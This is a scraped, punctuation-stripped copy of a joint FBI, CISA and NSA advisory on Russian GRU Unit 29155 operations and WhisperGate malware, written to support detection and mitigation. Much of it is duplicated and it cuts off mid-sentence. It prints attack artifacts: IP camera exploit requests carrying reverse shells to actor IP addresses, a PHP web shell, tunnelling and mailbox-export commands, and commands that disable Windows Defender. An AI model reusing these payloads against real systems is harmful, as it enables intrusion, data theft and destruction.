Russian Military Cyber Actors Target US and Global Critical Infrastructure CISA
pAn official website of the United States governmentppHeres how you knowpp
Official websites use gov
A gov website belongs to an official government organization in the United States
pp
Secure gov websites use HTTPS
A lock LockA locked padlock or https means youve safely connected to the gov website Share sensitive information only on official secure websites
ppFree Cyber ServicesElection Threat Updatesprotect2024Secure Our WorldShields UpReport A Cyber IssueppSearchppppFree Cyber ServicesElection Threat Updatesprotect2024Secure Our WorldShields UpReport A Cyber IssueppThe Federal Bureau of Investigation FBI Cybersecurity and Infrastructure Security Agency CISA and National Security Agency NSA assess that cyber actors affiliated with the Russian General Staff Main Intelligence Directorate GRU 161st Specialist Training Center Unit 29155 are responsible for computer network operations against global targets for the purposes of espionage sabotage and reputational harm since at least 2020 GRU Unit 29155 cyber actors began deploying the destructive WhisperGate malware against multiple Ukrainian victim organizations as early as January 13 2022 These cyber actors are separate from other known and more established GRUaffiliated cyber groups such as Unit 26165 and Unit 74455ppTo mitigate this malicious cyber activity organizations should take the following actions todayppThis Cybersecurity Advisory provides tactics techniques and procedures TTPs associated with Unit 29155 cyber actorsboth during and succeeding their deployment of WhisperGate against Ukraineas well as further analysis see Appendix A of the WhisperGate malware initially published in the joint advisory Destructive Malware Targeting Organizations in Ukraine published February 26 2022ppFBI CISA NSA and the following partners are releasing this joint advisory as a collective assessment of Unit 29155 cyber operations since 2020ppFor additional information on Russian statesponsored malicious cyber activity and related indictments see the recent US Department of Justice DOJ press releases for June 26 2024 and September 5 2024 FBIs Cyber Crime webpage and CISAs Russia Cyber Threat Overview and Advisories webpageppDownload the PDF version of this reportppFor a downloadable copy of indicators of compromise IOCsppNote This advisory uses the MITRE ATTCK Matrix for Enterprise framework version 15 See the MITRE ATTCK Tactics and Techniques section for a table of the threat actors activity mapped to MITRE ATTCK tactics and techniquesppFBI NSA and CISA assess Unit 29155 is responsible for attempted coups sabotage and influence operations and assassination attempts throughout Europe Unit 29155 expanded their tradecraft to include offensive cyber operations since at least 2020 Unit 29155 cyber actors objectives appear to include the collection of information for espionage purposes reputational harm caused by the theft and leakage of sensitive information and systematic sabotage caused by the destruction of data T1485ppFBI assesses the Unit 29155 cyber actors to be junior activeduty GRU officers under the direction of experienced Unit 29155 leadership These individuals appear to be gaining cyber experience and enhancing their technical skills through conducting cyber operations and intrusions Additionally FBI assesses Unit 29155 cyber actors rely on nonGRU actors including known cybercriminals and enablers to conduct their operationsppThe cybersecurity industry provides overlapping cyber threat intelligence IOCs and mitigation recommendations related to Unit 29155 cyber actors While not all encompassing the following are the most notable threat group names related under MITRE ATTCK G1003 and commonly used within the cybersecurity communityppNote Cybersecurity companies have different methods of tracking and attributing cyber actors and this may not be a 11 correlation to the US Governments understanding for all activity related to these groupingsppIn addition to WhisperGate and other incidents against Ukraine Unit 29155 cyber actors have conducted computer network operations against numerous members of the North Atlantic Treaty Organization NATO in Europe and North America as well as countries in Europe Latin America and Central Asia The activity includes cyber campaigns such as website defacements infrastructure scanning data exfiltration and data leak operations These actors sell or publicly release exfiltrated victim data obtained from their compromises Since early 2022 the primary focus of the cyber actors appears to be targeting and disrupting efforts to provide aid to UkraineppTo date the FBI has observed more than 14000 instances of domain scanning across at least 26 NATO members and several additional European Union EU countries Unit 29155 cyber actors have defaced victim websites and used public website domains to post exfiltrated victim informationppWhether through offensive operations or scanning activity Unit 29155 cyber actors are known to target critical infrastructure and key resource sectors including the government services financial services transportation systems energy and healthcare sectors of NATO members the EU Central American and Asian countriesppUnit 29155 cyber actors have been observed targeting IP ranges T1595001 used within multiple government and critical infrastructure organizations The following are publicly available tools these cyber actors have used for scanning T1595 and vulnerability exploit efforts Unit 29155 cyber actors were not observed using these tools outside of their intended purpose Note Use of these tools should not be attributed as malicious without analytical evidence to support threat actor use andor controlppAdditionally Unit 29155 cyber actors have used infrastructure configured with OpenVPN configuration T1572 over port 1194 and in some instances to perform Active Directory AD enumeration Adminer in combination with Impacket and ldapdomaindump were tools used for gathering information on AD Once active devices are found Unit 29155 cyber actors look for vulnerabilities to exploit For example the Acunetix vulnerability scanning tool has been used for gathering information on potential vulnerabilities such as blind crosssite scripting as shown in the following commandsppGET indexphplogtoexamplecom0d0abcc009247318337731831bf6c194462bxssmeppGET CMSfilesloghtm HTTP11 nslookup hitccruvbrumn76c1bbxssmeperl e gethostbynamehitccruvbrumn76c1bbxssmeppAs the cyber actors perform reconnaissance on victim networks and discover vulnerabilities within victim web servers or machines they obtain CVE exploit scripts from GitHub repositories and use them against victim infrastructure T1588005 Unit 29155 cyber actors have been observed obtaining the respective exploit scripts for but not exploiting the following CVEsppAnalysis concluded Unit 29155 cyber actors have exploited the following CVEs for initial access T1190 as detailed throughout this advisoryppRather than build custom solutions Unit 29155 cyber actors use common red teaming techniques and publicly available tools to conduct cyber operations As a result many TTPs overlap with those of other cyber actors which can lead to misattributionppUnit 29155 actors and their cybercriminal affiliates commonly maintain accounts on dark web forums this has provided the opportunity to obtain various hacker tools such as malware and malware loaders T1588001 like Raspberry Robin and SaintBot While Unit 29155 cyber actors are best known for their use of WhisperGate malware against Ukraine the use of WhisperGate is not unique to the group Technical analysis can be found in Appendix A WhisperGate Malware AnalysisppUnit 29155 cyber actors are known to use VPNs to anonymize their operational activity These cyber actors commonly attempt to exploit weaknesses in internetfacing systems like the CVEs listed above to initially access networks In one instance Unit 29155 cyber actors exploited CVE202133044 and CVE202133045 on Dahua IP cameras to bypass identity authenticationppUnit 29155 cyber actors have used Shodan to scan for Internet of Things IoT devices using exploitation scripts to authenticate to IP cameras with default usernames and passwords T1078001 and exfiltrating images T1125 JPG files Attempts are then made to perform remote command execution via web to vulnerable IP cameras if successful cyber actors would dump configuration settings and credentials in plaintext as shown in Table 1 below T1552001ppAppendix B Indicators of Compromise lists threat actor IP addresses associated with the activity detailed in this sectionppNote These events are independent and not correlated as a single timeline of compromiseppThese requests are likely intended to dump configuration settings and credentials T1003pphxxpIPportPictureCatchcgiusernameNAMEpassword3becho20223c2123include20file22SYSCFG223e223etmpLoginhtm3bdatatype1attachment1channel1secret1keyPWNEDpphxxpIPportssicgitmpLoginhtmpptxtUserloltxtPassword2btConnectPieslC493gtiesbtConnectPieslC493gtieschRememberontxtPasswordg00dPa2424w0rDtxtUser7bprintsystem22bash20i203E26202Fdev2Ftcp2F17943175382F68702003E261227dpptxtUserloltxtPassword2btConnectPieslC493gtiesbtConnectPieslC493gtieschRememberontxtPasswordg00dPa2424w0rDtxtUser7bprintsystem22bash20i203E26202Fdev2Ftcp2F8117241302F68702003E261227dppprintsystembash i devtcp17943175386870 01ppprintsystembash i devtcp8117241306870 01ppIn addition incident analysis identified the general observations listed below on victim infrastructure Each event should be considered independent and may have been used by Unit 29155 cyber actors against multiple victims at different dates and timeframes Appendix B Indicators of Compromise lists IOCs associated with the observations in Table 1 and belowppSince at least 2020 Unit 29155 cyber actors have used virtual private servers VPSs T1583003 to host their operational tools perform reconnaissance exploit victim infrastructure and exfiltrate victim data Use of VPSs are common due to the associated IP addresses not identifying their true country of originppWhen an exploit is successfully executed on a victim system the actors can then launch a Meterpreter payload T1105 which commonly uses a reverse Transmission Control Protocol TCP connection to initiate communication with the threat actors infrastructure T1095 In one instance an established reverse TCP session was observed from victim to actor infrastructure via the following portsppAdditional observations were collected from victim engagement and analysis includingppOnce Unit 29155 cyber actors gain access to the victims internal network the victims have observedpp8212 SJ 00254 HISTFILEdevnullPATHsbinbinusrsbinusrbinLDLIBRARYPATHusrlocallibusrlocallib OLDPWDtmpPWDtmpICEunix HOME RC PID33980 java Lsocks512700113338pp8282 IJ 00398 HISTFILEdevnullPATHsbinbinusrsbinusrbinLDLIBRARYPATHusrlocallibusrlocallib OLDPWDtmpPWDtmpICEunix HOME RCPID33980 java Lrtcp00001338112700113338 F socks5IP Address7896ppif isset POST sessionsidwp pppppoll id POST sessionsidwp ppsessii explodeppbase64decodepollid sockfsockopensessiiO sessiilppprocprocopenbinsh i arrayOsock lsockpp2sock pipesppppfunction nbresappppevalsystembase64 decode a ppppif issetPOSTflppppflPOSTfl ppf2POSTf2 ppcontent base64 decodeflpph fopenf2wpptext contentppfwritehtext ppfclose h ppppExfiltrationppIn several instances analysis identified Unit 29155 cyber actors compressing victim data T1560 eg the entire filesystem select file system artifacts or user data andor database dumps to send back to their infrastructure These cyber actors commonly use the commandline program Rclone to exfiltrate data to a remote location from victim infrastructureppUnit 29155 cyber actors have exfiltrated Windows processes and artifacts such as Local Security Authority Subsystem Service LSASS memory dumps T1003001 Security Accounts Manager SAM files T1003002 and SECURITY and SYSTEM event log files T1654 As seen in victim incident response results actor infrastructure has also been used to compromise multiple mail servers T1114 and exfiltrate mail artifacts such as email messages using PowerShell T1059001 via the following commandpppowershell NewMailboxExportRequest Mailbox resource FilePath IP Addresssharefolder1pstppSee Table 3 to Table 14 for all referenced threat actor tactics and techniques in this advisory For assistance with mapping malicious cyber activity to the MITRE ATTCK framework see CISA and MITRE ATTCKs Best Practices for MITRE ATTCK Mapping and CISAs Decider ToolppUnit 29155 cyber actors have used a variety of public exploits including CVE202133044 CVE202133045 CVE202226134 and CVE202226138ppThe proof of concept exploit for CVE202226134 Through the Wire has also been used against a victims internetfacing Confluence serverppUnit 29155 cyber actors executed commands via ProxyChainsa tool used to route internal traffic through a series of proxiesppProxyChains was also used to provide further anonymity and modify system configuration to force network traffic through chains of SOCKS5 proxies and respective portsppThe authoring agencies recommend organizations implement the mitigations supplied below to improve organizational cybersecurity posture based on threat actor activity These mitigations align with the CrossSector Cybersecurity Performance Goals CPGs developed by CISA and the National Institute of Standards and Technology NIST The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats tactics techniques and procedures Visit CISAs CrossSector Cybersecurity Performance Goals for more information on the CPGs including additional recommended baseline protectionsppIn addition to applying mitigations the authoring agencies recommend exercising testing and validating your organizations security program against the threat behaviors mapped to the MITRE ATTCK for Enterprise framework in this advisory The authoring agencies recommend testing your existing security controls inventory to assess how they perform against the ATTCK techniques described in this advisoryppTo get startedppThe authoring agencies recommend continually testing your security program at scale in a production environment to ensure optimal performance against the MITRE ATTCK techniques identified in this advisoryppTo report suspicious or criminal activity related to information found in this joint Cybersecurity Advisory contact your local FBI field office or CISAs 247 Operations Center at saycisacisadhsgov or 888 2820870 When available please include the following information regarding the incident date time and location of the incident type of activity number of people affected type of equipment used for the activity the name of the submitting company or organization and a designated point of contact For NSA client requirements or general cybersecurity inquiries contact CybersecurityRequestsnsagovppThe information in this report is being provided as is for informational purposes only CISA and the authoring agencies do not endorse any commercial entity product company or service including any entities products or services linked within this document Any reference to specific commercial entities products processes or services by service mark trademark manufacturer or otherwise does not constitute or imply endorsement recommendation or favoring by CISA and the authoring agenciesppSeptember 5 2024 Initial versionppThis technical analysis details the WhisperGate malware deployed against Ukraine samples were collected from one victim and analyzed The analysis provides insight into Unit 29155 cyber actor infrastructure used for network scanning password compromising and data exfiltration against Ukraine NATO members in Europe and North America and countries in Latin America and Central AsiappUnit 29155 cyber actors use of WhisperGate involved the deployment of the malware files stage1exe and stage2exe WhisperGate has two stages that corrupts a systems master boot record displays a fake ransomware note and encrypts files based on certain file extensions see AA22057A The actors used multiple Discord accounts to store malware files including what appears to be development versions or iterations of the binaries Discord is commonly leveraged by threat actors as an endpoint for malware distribution and control in this case it was used to obtain the next step of the infection chain by directly sharing files through its platform In the case of stage2exe the binary communicated with Discord to obtain Tbopbhjpgthe malicious payload that is inmemory loaded and performs the destructive capabilities18ppThe Discord accounts associated with the WhisperGate campaign are categorized into three main clusters labeled below as Clusters 1 2 and 3 All clusters used Discord as a staging environment for malware deployment These groupings are based on analysis of threat actor IP addresses and the nature of the malware that existed within the accounts The following sections include notable details found within each clusterppCluster 1 contained the following filesppCluster 2 containedppCluster 3 containedppTwo Windows Portable Executable PE files stage1exe and stage2exe were obtained from the Ukrainian victim for analysis One PE file asdexe was obtained from a US victimppstage1exe was obtained from the C path of the Ukrainian victims Windows machine stage1exe executes when the infected device is powered down overwriting the master boot record MBR and preventing the system from booting normally Table 15 lists the hashes and properties attributed to stage1exeppasdexe is likely a development version of stage1exe While the behavior of asdexe is similar to stage1exe the messages displayed were differentppstage2exe was obtained from the C path of the Ukrainian victims Windows machine Table 17 lists the hashes and properties attributed to stage2exeppTable 18 lists the following chronological observations when stage2exe executespphxxpcdndiscordappcomattachmentspp928503440139771947930108637681184768TbopbhjpgppThe Visual Basic Script VBS file contained the following commandppCreateObjectWScriptShellRun powershell SetMpPreference ExclusionPath C 0 FalseppCUsersuserAppDataLocalTempAdvancedRunexe EXEFilename CWindowsSystem32scexe WindowState 0 CommandLine stop WinDefend StartDirectory RunAs 8 RunppCUsersuserAppDataLocalTempAdvancedRunexe EXEFilename CWindowsSystem32WindowsPowerShellv10powershellexe WindowState 0 CommandLine rmdir CProgramDataMicrosoftWindows Defender Recurse StartDirectory RunAs 8 RunppStatic analysis was further conducted on two files stage2exe Tbopbhjpg to uncover additional malware functionality and attributesppStatic analysis was performed on a variant of stage2exe its hashes and properties are listed in Table 19 below Of note the MD5 and SHA256 hash values were different than those obtained from the Ukrainian victim machine listed above in Table 17 Behavioral analysis was also performed on the below variant and both files exhibited the same behaviorppThis variant of stage2exe contained multiple layers of executionppAn account in Discord Cluster 1 contained malware with the following hashes labeled as TbopbhjpgppWhen viewing payload Tbopbhjpg using a hex editor it ended with value ZM or hex values 5A 4Dthis indicated the payload was a reversed PE Reversing the bytes of Tbopbhjpg revealed the hashes of the resulting payload listed in Table 20 belowppThe original filename from the resulting payload was a Dynamic Link Library DLL file Frkmlkdkdubkznbkmcfdll its attributes are listed in Table 21ppu2005 u2005 u2009 u2008 u2001 u2007 u2009 u200b u200a u2005ppNote This format annotates action taken by EazFuscator to obfuscate items making it difficult for malware analysts to reviewppstage2exe was observed calling method Ylfwdwgmpilzyaph to begin decrypting resource 78c855a088924e92a7f60d661c3d1845 The reflection library was used to execute method Ylfwdwgmpilzyaph as shown in the following C code blockppusing SystemReflectionstring path Frkmlkdkdubkznbkmcfdllstring fqpn PathGetFullPathpathAssembly assembly AssemblyLoadFilefqpnType type assemblyGetTypeClassLibrary1MaintypeInvokeMemberYlfwdwgmpilzyaph BindingFlagsInvokeMethod null null nullppThe following application configuration accompanied the above code block to allow loading from remote sourcesppxml version10 encodingutf8 configurationruntimeloadFromRemoteSources enabledtrueruntimeconfigurationppUpon invoking the method Ylfwdwgmpilzyaph Nmddfrqqrbyjeygggdavbs wrote to the Windows TEMP directory and has the following attributes as listed in Table 22 belowppThe VBS code listed in Table 22 used a WScript shell that executed as a Windows application which ran a PowerShell command to exclude the C drive from Windows Defenders security checks Malware analysts decoded and decrypted one of the resources from Frkmlkdkdubkznbkmcfdll 78c855a088924e92a7f60d661c3d1845 Further analysis of Frkmlkdkdubkznbkmcfdll resulted in an additional DLL file with the following hashesppThis decrypted DLL file contained two resources AdvancedRun and WaqybgppTable 23 and Table 24 list the file properties for both the AdvancedRun and reversed Waqybg decompressed filesppThe reversed and decompressed Waqybg files contained file corruption logic along with a final command to ping arbitrarily and delete itself cmdexe min C ping 111111111111 n 5 w 10 Nul Del f q s Waqybg is known as WhisperKilla malware downloaded by WhisperGate that destroys files with specific extensions1921ppThe following file extensions listed in Table 25 were targeted for file corruption with the equivalent of the wcscmp C function logic a string compare function The corruption logic included overwriting 0x100000 or 1 MB worth of 0xcc values per targeted fileppstage2exe and its respective payload Tbopbhjpg served as a template for other malware within Discord Cluster 1 While most of these other malware files have not been observed in open source reporting malware analysts assess them as payloads that follow the unravelling process listed in Figure 1 belowppTable 26 below provides a list of MD5 hashes for files found within Discord Cluster 1 When reversed these files become DLL files which were structured similarly to FrkmlkdkdubkznbkmcfdllppNote Analysts identified the files below in Discord Cluster 1 the files are staged on the Cluster in reversed byte order Analysts reversed the file byte order for each file into their proper portable executable format eg Functional format The hashes in Table 26 represent both byte ordersppTable 27 lists observed IP addresses that were first observed as early as 2022 and have been historically linked to Unit 29155 infrastructure These IPs are considered historical infrastructure and should be investigated for associated abnormal or malicious activityppThreat actors can exploit jump hosts also known as jump servers or bastion hosts to gain unauthorized access or perform malicious activities within a protected network In this context the domains listed in Table 28 represent the tools used to establish functionality for creating a jump hostppThis product is provided subject to this Notification and this Privacy Use policyppWe recently updated our anonymous product survey wed welcome your feedbackp
Official websites use gov
A gov website belongs to an official government organization in the United States
pp
Secure gov websites use HTTPS
A lock LockA locked padlock or https means youve safely connected to the gov website Share sensitive information only on official secure websites
ppFree Cyber ServicesElection Threat Updatesprotect2024Secure Our WorldShields UpReport A Cyber IssueppSearchppppFree Cyber ServicesElection Threat Updatesprotect2024Secure Our WorldShields UpReport A Cyber IssueppThe Federal Bureau of Investigation FBI Cybersecurity and Infrastructure Security Agency CISA and National Security Agency NSA assess that cyber actors affiliated with the Russian General Staff Main Intelligence Directorate GRU 161st Specialist Training Center Unit 29155 are responsible for computer network operations against global targets for the purposes of espionage sabotage and reputational harm since at least 2020 GRU Unit 29155 cyber actors began deploying the destructive WhisperGate malware against multiple Ukrainian victim organizations as early as January 13 2022 These cyber actors are separate from other known and more established GRUaffiliated cyber groups such as Unit 26165 and Unit 74455ppTo mitigate this malicious cyber activity organizations should take the following actions todayppThis Cybersecurity Advisory provides tactics techniques and procedures TTPs associated with Unit 29155 cyber actorsboth during and succeeding their deployment of WhisperGate against Ukraineas well as further analysis see Appendix A of the WhisperGate malware initially published in the joint advisory Destructive Malware Targeting Organizations in Ukraine published February 26 2022ppFBI CISA NSA and the following partners are releasing this joint advisory as a collective assessment of Unit 29155 cyber operations since 2020ppFor additional information on Russian statesponsored malicious cyber activity and related indictments see the recent US Department of Justice DOJ press releases for June 26 2024 and September 5 2024 FBIs Cyber Crime webpage and CISAs Russia Cyber Threat Overview and Advisories webpageppDownload the PDF version of this reportppFor a downloadable copy of indicators of compromise IOCsppNote This advisory uses the MITRE ATTCK Matrix for Enterprise framework version 15 See the MITRE ATTCK Tactics and Techniques section for a table of the threat actors activity mapped to MITRE ATTCK tactics and techniquesppFBI NSA and CISA assess Unit 29155 is responsible for attempted coups sabotage and influence operations and assassination attempts throughout Europe Unit 29155 expanded their tradecraft to include offensive cyber operations since at least 2020 Unit 29155 cyber actors objectives appear to include the collection of information for espionage purposes reputational harm caused by the theft and leakage of sensitive information and systematic sabotage caused by the destruction of data T1485ppFBI assesses the Unit 29155 cyber actors to be junior activeduty GRU officers under the direction of experienced Unit 29155 leadership These individuals appear to be gaining cyber experience and enhancing their technical skills through conducting cyber operations and intrusions Additionally FBI assesses Unit 29155 cyber actors rely on nonGRU actors including known cybercriminals and enablers to conduct their operationsppThe cybersecurity industry provides overlapping cyber threat intelligence IOCs and mitigation recommendations related to Unit 29155 cyber actors While not all encompassing the following are the most notable threat group names related under MITRE ATTCK G1003 and commonly used within the cybersecurity communityppNote Cybersecurity companies have different methods of tracking and attributing cyber actors and this may not be a 11 correlation to the US Governments understanding for all activity related to these groupingsppIn addition to WhisperGate and other incidents against Ukraine Unit 29155 cyber actors have conducted computer network operations against numerous members of the North Atlantic Treaty Organization NATO in Europe and North America as well as countries in Europe Latin America and Central Asia The activity includes cyber campaigns such as website defacements infrastructure scanning data exfiltration and data leak operations These actors sell or publicly release exfiltrated victim data obtained from their compromises Since early 2022 the primary focus of the cyber actors appears to be targeting and disrupting efforts to provide aid to UkraineppTo date the FBI has observed more than 14000 instances of domain scanning across at least 26 NATO members and several additional European Union EU countries Unit 29155 cyber actors have defaced victim websites and used public website domains to post exfiltrated victim informationppWhether through offensive operations or scanning activity Unit 29155 cyber actors are known to target critical infrastructure and key resource sectors including the government services financial services transportation systems energy and healthcare sectors of NATO members the EU Central American and Asian countriesppUnit 29155 cyber actors have been observed targeting IP ranges T1595001 used within multiple government and critical infrastructure organizations The following are publicly available tools these cyber actors have used for scanning T1595 and vulnerability exploit efforts Unit 29155 cyber actors were not observed using these tools outside of their intended purpose Note Use of these tools should not be attributed as malicious without analytical evidence to support threat actor use andor controlppAdditionally Unit 29155 cyber actors have used infrastructure configured with OpenVPN configuration T1572 over port 1194 and in some instances to perform Active Directory AD enumeration Adminer in combination with Impacket and ldapdomaindump were tools used for gathering information on AD Once active devices are found Unit 29155 cyber actors look for vulnerabilities to exploit For example the Acunetix vulnerability scanning tool has been used for gathering information on potential vulnerabilities such as blind crosssite scripting as shown in the following commandsppGET indexphplogtoexamplecom0d0abcc009247318337731831bf6c194462bxssmeppGET CMSfilesloghtm HTTP11 nslookup hitccruvbrumn76c1bbxssmeperl e gethostbynamehitccruvbrumn76c1bbxssmeppAs the cyber actors perform reconnaissance on victim networks and discover vulnerabilities within victim web servers or machines they obtain CVE exploit scripts from GitHub repositories and use them against victim infrastructure T1588005 Unit 29155 cyber actors have been observed obtaining the respective exploit scripts for but not exploiting the following CVEsppAnalysis concluded Unit 29155 cyber actors have exploited the following CVEs for initial access T1190 as detailed throughout this advisoryppRather than build custom solutions Unit 29155 cyber actors use common red teaming techniques and publicly available tools to conduct cyber operations As a result many TTPs overlap with those of other cyber actors which can lead to misattributionppUnit 29155 actors and their cybercriminal affiliates commonly maintain accounts on dark web forums this has provided the opportunity to obtain various hacker tools such as malware and malware loaders T1588001 like Raspberry Robin and SaintBot While Unit 29155 cyber actors are best known for their use of WhisperGate malware against Ukraine the use of WhisperGate is not unique to the group Technical analysis can be found in Appendix A WhisperGate Malware AnalysisppUnit 29155 cyber actors are known to use VPNs to anonymize their operational activity These cyber actors commonly attempt to exploit weaknesses in internetfacing systems like the CVEs listed above to initially access networks In one instance Unit 29155 cyber actors exploited CVE202133044 and CVE202133045 on Dahua IP cameras to bypass identity authenticationppUnit 29155 cyber actors have used Shodan to scan for Internet of Things IoT devices using exploitation scripts to authenticate to IP cameras with default usernames and passwords T1078001 and exfiltrating images T1125 JPG files Attempts are then made to perform remote command execution via web to vulnerable IP cameras if successful cyber actors would dump configuration settings and credentials in plaintext as shown in Table 1 below T1552001ppAppendix B Indicators of Compromise lists threat actor IP addresses associated with the activity detailed in this sectionppNote These events are independent and not correlated as a single timeline of compromiseppThese requests are likely intended to dump configuration settings and credentials T1003pphxxpIPportPictureCatchcgiusernameNAMEpassword3becho20223c2123include20file22SYSCFG223e223etmpLoginhtm3bdatatype1attachment1channel1secret1keyPWNEDpphxxpIPportssicgitmpLoginhtmpptxtUserloltxtPassword2btConnectPieslC493gtiesbtConnectPieslC493gtieschRememberontxtPasswordg00dPa2424w0rDtxtUser7bprintsystem22bash20i203E26202Fdev2Ftcp2F17943175382F68702003E261227dpptxtUserloltxtPassword2btConnectPieslC493gtiesbtConnectPieslC493gtieschRememberontxtPasswordg00dPa2424w0rDtxtUser7bprintsystem22bash20i203E26202Fdev2Ftcp2F8117241302F68702003E261227dppprintsystembash i devtcp17943175386870 01ppprintsystembash i devtcp8117241306870 01ppIn addition incident analysis identified the general observations listed below on victim infrastructure Each event should be considered independent and may have been used by Unit 29155 cyber actors against multiple victims at different dates and timeframes Appendix B Indicators of Compromise lists IOCs associated with the observations in Table 1 and belowppSince at least 2020 Unit 29155 cyber actors have used virtual private servers VPSs T1583003 to host their operational tools perform reconnaissance exploit victim infrastructure and exfiltrate victim data Use of VPSs are common due to the associated IP addresses not identifying their true country of originppWhen an exploit is successfully executed on a victim system the actors can then launch a Meterpreter payload T1105 which commonly uses a reverse Transmission Control Protocol TCP connection to initiate communication with the threat actors infrastructure T1095 In one instance an established reverse TCP session was observed from victim to actor infrastructure via the following portsppAdditional observations were collected from victim engagement and analysis includingppOnce Unit 29155 cyber actors gain access to the victims internal network the victims have observedpp8212 SJ 00254 HISTFILEdevnullPATHsbinbinusrsbinusrbinLDLIBRARYPATHusrlocallibusrlocallib OLDPWDtmpPWDtmpICEunix HOME RC PID33980 java Lsocks512700113338pp8282 IJ 00398 HISTFILEdevnullPATHsbinbinusrsbinusrbinLDLIBRARYPATHusrlocallibusrlocallib OLDPWDtmpPWDtmpICEunix HOME RCPID33980 java Lrtcp00001338112700113338 F socks5IP Address7896ppif isset POST sessionsidwp pppppoll id POST sessionsidwp ppsessii explodeppbase64decodepollid sockfsockopensessiiO sessiilppprocprocopenbinsh i arrayOsock lsockpp2sock pipesppppfunction nbresappppevalsystembase64 decode a ppppif issetPOSTflppppflPOSTfl ppf2POSTf2 ppcontent base64 decodeflpph fopenf2wpptext contentppfwritehtext ppfclose h ppppExfiltrationppIn several instances analysis identified Unit 29155 cyber actors compressing victim data T1560 eg the entire filesystem select file system artifacts or user data andor database dumps to send back to their infrastructure These cyber actors commonly use the commandline program Rclone to exfiltrate data to a remote location from victim infrastructureppUnit 29155 cyber actors have exfiltrated Windows processes and artifacts such as Local Security Authority Subsystem Service LSASS memory dumps T1003001 Security Accounts Manager SAM files T1003002 and SECURITY and SYSTEM event log files T1654 As seen in victim incident response results actor infrastructure has also been used to compromise multiple mail servers T1114 and exfiltrate mail artifacts such as email messages using PowerShell T1059001 via the following commandpppowershell NewMailboxExportRequest Mailbox resource FilePath IP Addresssharefolder1pstppSee Table 3 to Table 14 for all referenced threat actor tactics and techniques in this advisory For assistance with mapping malicious cyber activity to the MITRE ATTCK framework see CISA and MITRE ATTCKs Best Practices for MITRE ATTCK Mapping and CISAs Decider ToolppUnit 29155 cyber actors have used a variety of public exploits including CVE202133044 CVE202133045 CVE202226134 and CVE202226138ppThe proof of concept exploit for CVE202226134 Through the Wire has also been used against a victims internetfacing Confluence serverppUnit 29155 cyber actors executed commands via ProxyChainsa tool used to route internal traffic through a series of proxiesppProxyChains was also used to provide further anonymity and modify system configuration to force network traffic through chains of SOCKS5 proxies and respective portsppThe authoring agencies recommend organizations implement the mitigations supplied below to improve organizational cybersecurity posture based on threat actor activity These mitigations align with the CrossSector Cybersecurity Performance Goals CPGs developed by CISA and the National Institute of Standards and Technology NIST The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats tactics techniques and procedures Visit CISAs CrossSector Cybersecurity Performance Goals for more information on the CPGs including additional recommended baseline protectionsppIn addition to applying mitigations the authoring agencies recommend exercising testing and validating your organizations security program against the threat behaviors mapped to the MITRE ATTCK for Enterprise framework in this advisory The authoring agencies recommend testing your existing security controls inventory to assess how they perform against the ATTCK techniques described in this advisoryppTo get startedppThe authoring agencies recommend continually testing your security program at scale in a production environment to ensure optimal performance against the MITRE ATTCK techniques identified in this advisoryppTo report suspicious or criminal activity related to information found in this joint Cybersecurity Advisory contact your local FBI field office or CISAs 247 Operations Center at saycisacisadhsgov or 888 2820870 When available please include the following information regarding the incident date time and location of the incident type of activity number of people affected type of equipment used for the activity the name of the submitting company or organization and a designated point of contact For NSA client requirements or general cybersecurity inquiries contact CybersecurityRequestsnsagovppThe information in this report is being provided as is for informational purposes only CISA and the authoring agencies do not endorse any commercial entity product company or service including any entities products or services linked within this document Any reference to specific commercial entities products processes or services by service mark trademark manufacturer or otherwise does not constitute or imply endorsement recommendation or favoring by CISA and the authoring agenciesppSeptember 5 2024 Initial versionppThis technical analysis details the WhisperGate malware deployed against Ukraine samples were collected from one victim and analyzed The analysis provides insight into Unit 29155 cyber actor infrastructure used for network scanning password compromising and data exfiltration against Ukraine NATO members in Europe and North America and countries in Latin America and Central AsiappUnit 29155 cyber actors use of WhisperGate involved the deployment of the malware files stage1exe and stage2exe WhisperGate has two stages that corrupts a systems master boot record displays a fake ransomware note and encrypts files based on certain file extensions see AA22057A The actors used multiple Discord accounts to store malware files including what appears to be development versions or iterations of the binaries Discord is commonly leveraged by threat actors as an endpoint for malware distribution and control in this case it was used to obtain the next step of the infection chain by directly sharing files through its platform In the case of stage2exe the binary communicated with Discord to obtain Tbopbhjpgthe malicious payload that is inmemory loaded and performs the destructive capabilities18ppThe Discord accounts associated with the WhisperGate campaign are categorized into three main clusters labeled below as Clusters 1 2 and 3 All clusters used Discord as a staging environment for malware deployment These groupings are based on analysis of threat actor IP addresses and the nature of the malware that existed within the accounts The following sections include notable details found within each clusterppCluster 1 contained the following filesppCluster 2 containedppCluster 3 containedppTwo Windows Portable Executable PE files stage1exe and stage2exe were obtained from the Ukrainian victim for analysis One PE file asdexe was obtained from a US victimppstage1exe was obtained from the C path of the Ukrainian victims Windows machine stage1exe executes when the infected device is powered down overwriting the master boot record MBR and preventing the system from booting normally Table 15 lists the hashes and properties attributed to stage1exeppasdexe is likely a development version of stage1exe While the behavior of asdexe is similar to stage1exe the messages displayed were differentppstage2exe was obtained from the C path of the Ukrainian victims Windows machine Table 17 lists the hashes and properties attributed to stage2exeppTable 18 lists the following chronological observations when stage2exe executespphxxpcdndiscordappcomattachmentspp928503440139771947930108637681184768TbopbhjpgppThe Visual Basic Script VBS file contained the following commandppCreateObjectWScriptShellRun powershell SetMpPreference ExclusionPath C 0 FalseppCUsersuserAppDataLocalTempAdvancedRunexe EXEFilename CWindowsSystem32scexe WindowState 0 CommandLine stop WinDefend StartDirectory RunAs 8 RunppCUsersuserAppDataLocalTempAdvancedRunexe EXEFilename CWindowsSystem32WindowsPowerShellv10powershellexe WindowState 0 CommandLine rmdir CProgramDataMicrosoftWindows Defender Recurse StartDirectory RunAs 8 RunppStatic analysis was further conducted on two files stage2exe Tbopbhjpg to uncover additional malware functionality and attributesppStatic analysis was performed on a variant of stage2exe its hashes and properties are listed in Table 19 below Of note the MD5 and SHA256 hash values were different than those obtained from the Ukrainian victim machine listed above in Table 17 Behavioral analysis was also performed on the below variant and both files exhibited the same behaviorppThis variant of stage2exe contained multiple layers of executionppAn account in Discord Cluster 1 contained malware with the following hashes labeled as TbopbhjpgppWhen viewing payload Tbopbhjpg using a hex editor it ended with value ZM or hex values 5A 4Dthis indicated the payload was a reversed PE 